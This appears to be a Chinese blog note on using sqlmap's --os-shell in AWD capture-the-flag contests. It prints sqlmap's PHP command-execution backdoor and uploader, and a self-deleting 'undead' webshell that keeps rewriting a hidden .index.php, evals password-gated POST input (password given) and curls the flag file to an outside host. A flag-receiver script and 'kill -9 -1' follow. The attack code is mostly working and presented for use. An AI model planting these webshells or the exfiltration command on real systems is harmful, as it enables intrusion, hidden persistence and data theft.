sqlmap

最新推荐文章于 2024-09-10 08:26:51 发布
最新推荐文章于 2024-09-10 08:26:51 发布
阅读量214 收藏
点赞数
分类专栏: 笔记 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yaoge1225/article/details/120418163
版权

sqlmap

Sqlmap使用详解 - 安全客,安全资讯平台 (anquanke.com)

img

路径是绝对路径,且可以写入文件

sqlmap --os-shell会生成两个php文件
一个是文件上传,一个是后门文件。。。

//后门
<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set("max_execution_time",0);$z=@ini_get("disable_functions");if(!empty($z)){$z=preg_replace("/[, ]+/",',',$z);$z=explode(',',$z);$z=array_map("trim",$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f("system")){ob_start();system($c);$w=ob_get_clean();}elseif(f("proc_open")){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f("shell_exec")){$w=shell_exec($c);}elseif(f("passthru")){ob_start();passthru($c);$w=ob_get_clean();}elseif(f("popen")){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f("exec")){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}echo"<pre>$w</pre>";?>
    
    
//文件上传
<?php
if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/> <input type=submit name=upload value=upload></form>";}?>

img

img

但是这个后门貌似不能直接蚁剑直连

在这里插入图片描述

另一个文件上传的可以上传自己的🐎儿

img

img

上次awd的ezsql也可以用上

img

$message_id可控

直接

sqlmap -u "url?message_id=1"  --os-shell

一把梭

网站目录如果是常规的选1自动

如果不是常见的就选2自己写入路径

img

然后上传自己的🐎开始搞事情

一个不死马

<?php 
ignore_user_abort(true);
//ignore_user_abort — 设置客户端断开连接时是否中断脚本的执行
//可选。如果设置为 true,则忽略与用户的断开,如果设置为 false,会导致脚本停止运行。
//PHP 以命令行脚本执行时,当脚本终端结束,脚本不会被立即中止,除非设置 value 为 true,否则脚本输出任意字符时会被中止。

set_time_limit(0);
//set_time_limit — 设置脚本最大执行时间,如果超过了此设置,脚本返回一个致命的错误。默认值为30秒

unlink(__FILE__);
//删除本身

$file = './.index.php';
$code = '<?php if(md5($_POST["pass"])=="3a50065e1709acc47ba0c9238294364f"){@eval($_POST[a]);system(\'curl "http://ip/readflag.php" -d "str=$(cat /flag)"\');} ?>';
//pass=Sn3rtf4ck 马儿用法:.index.php	POST:pass=Sn3rtf4ck&a=执行命令 //执行同时发送flag,根据实际情况改

while (1){
	file_put_contents($file,$code);//写入马
	usleep(5000);//usleep — 以指定的微秒数延迟执行//1微秒(micro second)是百万分之一秒。
}

?>

<?php
$myfile = fopen("flag.txt", "a+") or die("Unable to open file!");
$str = $_POST['str'];
fwrite($myfile, $str."\n");
fclose($myfile);
?>


kill -9 -1

杀全部进程,杀掉不死马

所犯错误

没有先down机,被种马,在xftp里面看不见被种马

前缀有 ‘.’ ls看不见
_Stary
关注
专栏目录
SqlMap
zhaji001
12-18 1万+
收集的一些技巧资源来之互联网 -u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&amp;id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log”  恢复:-s “xx.log” –r...
SQLmap
AmyBaby00的博客
10-21 2850
本文为学习笔记,仅限学习交流 不得利用、从事危害国家或人民安全、荣誉和利益等活动 SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。 方法:打开sqlmap输入Python sqlmap.py -u +url 1、指定目标注入地址)检测出存在可利用漏洞 python2 sqlmap.py -u “http://127.0.0.1/sqli/less...
ctf awd知识分享(常用命令,不死马,waf,文件监控)
2202_75361164的博客
10-28 1339
ctf awd知识分享(常用命令,不死马,waf,文件监控)
利用sqlmap和蚁剑进行简单的渗透测试和挂小马操作
dbabs的博客
01-24 618
利用sqlmap进行文件上传和简单的渗透测试
7、应急响应-战中溯源反制&对抗上线&蚁剑&CS&Goby&Sqlmap等安全工具
m0_65842464的博客
01-29 2762
黑客一般会用到工具Sqlmap,Goby等对目标网站的现有资产做批量扫描和测试,同时也会利用Web应用漏洞上传后门来上线肉机,用到工具例如:蚁剑,CS等,那么作为蓝队应急人员,就可以针对这些行为采取反制手段。命令管道符:ping "`dir`" , linux系统执行该命令时,管道符中的字符串被当作命令执行。原理:蓝队在红队攻击目标上写一个特殊文件,红队用goby扫描分析时会触发反制被蓝队拿到机器权限。同样以上命令在红队攻击机执行时,参数b管道符中的字符串会被当做命令执行。
第81天-红蓝对抗-AWD 监控&不死马&垃圾包&资源
MCTSOG的博客
05-25 1296
思维导图 演示案例: 案例 1-防守-流量监控-实时获取访问数据包流量 利用 WEB 访问监控配合文件监控能实现 WEB 攻击分析及后门清除操作,确保写入后门操作失效, 也能确保分析到无后门攻击漏洞的数据包便于后期利用 上传文件监控脚本log-record.php,该脚本需要在网站配置文件footer.php中包含一下,否则无法正常调用运行。 之后一旦有人访问了系统,它就会在/tmp/目录下生成一个log日志。 接下来我们就可以实时监控该日志。 1.分析有后门或无后门的攻击行为数据包找到漏洞进行修复
【渗透测试】文件上传漏洞
ssrf
08-01 1010
一、任意文件上传 靶场DVWA 安全级别:低 上传php文件 <?php @eval($_POST['caidao']);?> // 一句话木马 查看后端源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $targe
2021【线下】巅峰极客部分题目总结
qq_45603443的博客
10-13 2401
2021【线下】巅峰极客部分题目总结 ⽐赛登录信息tpthinkadminecshopredisjenkins学校物流内⽹0x00x10x2Tip ⽐赛登录信息 https://172.20.1.1/answer_client tp thinkphp rce⼯具直接打 但是他过滤了⼀堆的函数 执⾏scnadir的时候发现已经有⼈写了shell 所以就不⽤⾃⼰写了 readfile读了⼀下别⼈的shell 发现有个pass校验 chamd5查得到 然后直接蹭⻋ Sn3rtf4ck 3a50065e1709ac
sqlmap v1.8 最新版
03-05
Sqlmap 是一个自动化的 SQL 注入工具,其主要功能是扫描、发现并利用给定的 Url 的 Sql 注入漏洞,目前支持 MySQL、 Oracle、 PostgreSQL、 Microsoft SQL Server、 Microsoft Access 等主流数据库。 Sqlmap 使用 5 ...
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap是一款强大的、自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,它可以帮助安全研究人员或渗透测试者发现并利用网站数据库的安全弱点。这个压缩包`sqlmapproject-sqlmap-1230e57`很可能包含了SQLmap的源...
sqlmap-master
01-04
SQLMap:渗透测试中的神器》 SQLMap是一款开源的自动化SQL注入工具,主要用于检测网站应用程序是否存在SQL注入漏洞,并能够进一步利用这些漏洞进行数据库的控制和数据的提取。标题"sqlmap-master"暗示了我们讨论...
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.tar.gz)
04-20
SQLMap:强大的SQL注入工具详解》 SQLMap是一款开源的自动化SQL注入工具,用于检测和利用SQL注入漏洞。在网络安全领域,SQL注入是一种常见的攻击手段,通过输入恶意的SQL语句来获取、修改、删除数据库中的数据。...
exe版sqlmap注入工具
07-26
SQLMap是一款著名的开源自动化SQL注入工具,主要用于检测和利用SQL注入漏洞,以获取数据库中的敏感信息,甚至完全控制系统。在给定的“exe版sqlmap注入工具”中,我们可以理解为这个版本是专为不支持Python环境的...
测试
qq_17765763的博客
12-11 353
ignore_user_abort();//关掉浏览器,PHP脚本也可以继续执行. set_time_limit(3000);// 通过set_time_limit(0)可以让程序无限制的执行下去 $interval=5;// 每隔5s运行 //方法1--死循环 do{ echo '测试'.time().''; sleep($interval);// 等待5s }wh
[sqlmap]学习2
qq_44836237的博客
01-25 2040
sqlmap --os-shell 环境还是用的sqli-labs 首先使用--os-shell时要他这里有注入点 这里我是知道这里有注入点直接加--os-shell,下面是成功截图 会让你选择语言和路径,我用的是D:\phpstudy_pro\WWW\ 出现os-shell>则成功 原理: 看原理可以抓包,通过-proxy让burp抓包看 这里不抓包直接看,可以看到我们给的绝对路径下出现两个文件 访问tmpuhhyu.php 就是用into o...
0x0F-HackTheBox-Control
0pr
05-12 704
Command History masscan - found several service ports - effective nmap - found http methods and some other services - effective gobuster - found some redirect directories - effective Burp Suite - modified some headers to repeat the request - ineffective Ct
解析php中$_REQUEST的用法
热门推荐
vip_linux的专栏
09-10 1万+
本文介绍下,php中$_REQUEST的具体用法,通过几个例子,帮助大家理解。 有关php中$_REQUEST的用法,很多资料上都有介绍。 在php手册中,这个变量解释为:"默认情况下包含了 $_GET,$_POST 和 $_COOKIE 的数组。" 注意其中包含cookie的内容,做个测试: 1 2
sqlmap使用之读写文件-执行命令
千寻的博客
08-06 4758
文章目录sqlmap-读写文件-执行命令-基础实验实验目的实验环境实验工具实验内容步骤1. 访问目标机web页面步骤2. 发现注入点步骤3. 进入os-shell交互界面步骤4 选择网站语言步骤5 输入网站的绝对路径步骤6. 读取网站敏感文件如/etc/passwd步骤7.在当前目录下写入任意文件,这里我写入shell.php一句话木马步骤8.使用蚁剑执行总结免责声明 sqlmap-读写文件-执行命令-基础实验 实验目的 练习sqlmap读写文件-执行命令 实验环境 目标机:window server 2
PHP智驭未来悦享生活智慧小区物业管理小程序系统源码
最新发布
2401_84413757的博客
09-10 702
它集成了多项实用功能,无论是业主还是物业管理人员,都能通过简单的一键操作,轻松实现小区的日常管理。无论是清晨的晨跑,还是夜晚的归家,都不再需要为这些琐事烦恼,真正实现了“智驭未来,悦享生活”。无论是分享生活的点滴,还是参与社区的各类活动,都能让业主们感受到家的温暖和归属感。而今天,我要带大家走进的,正是这股智慧浪潮中的一股清流——“智驭未来悦享生活”智慧小区物业管理小程序。“智驭未来悦享生活”智慧小区物业管理小程序的出现,不仅为小区管理带来了革命性的变革,更为我们描绘了一幅未来生活的美好蓝图。
sqlmap详细使用指南
"这篇文档是关于sqlmap工具的详细使用指南,主要来自sqlmapproject/sqlmap项目。sqlmap是一款自动化的SQL注入工具,用于检测和利用SQL注入漏洞,以帮助安全研究人员或渗透测试者发现并接管数据库。" 在深入讨论...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值